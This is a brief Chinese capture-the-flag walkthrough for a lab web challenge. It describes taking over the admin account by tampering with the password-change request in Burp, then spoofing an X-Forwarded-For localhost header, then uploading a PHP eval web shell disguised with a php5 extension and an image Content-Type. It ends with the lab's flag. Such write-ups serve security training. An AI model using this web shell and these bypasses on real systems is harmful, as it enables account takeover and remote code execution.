打开场景,访问网页显示要登录,于是注册账号
注册账号显示admin已存在,于是注册一个admin1
使用burp拦截抓包,打开findwp
放包,修改密码,将抓取到的数据包中的admin1改为admin,成功修改admin密码
使用修改后的密码登录admin
点击manage,显示IP不被允许。
一般情况下 admin 管理员是本地登录的,因此我们要在包中添加 X-Forwarded-For: 127.0.0.1表示本地登录
按F12查看源码
发现为文件上传,访问页面
上传一个1.php文件,抓包后修改后缀为php5,修改Content-Type为image/jpeg,添加<script language='php'>eval($_POST['a’])</script>,放行
得到flag:cyberpeace{bbfbd5d3f05f8d46c07fd3d12934e4b1}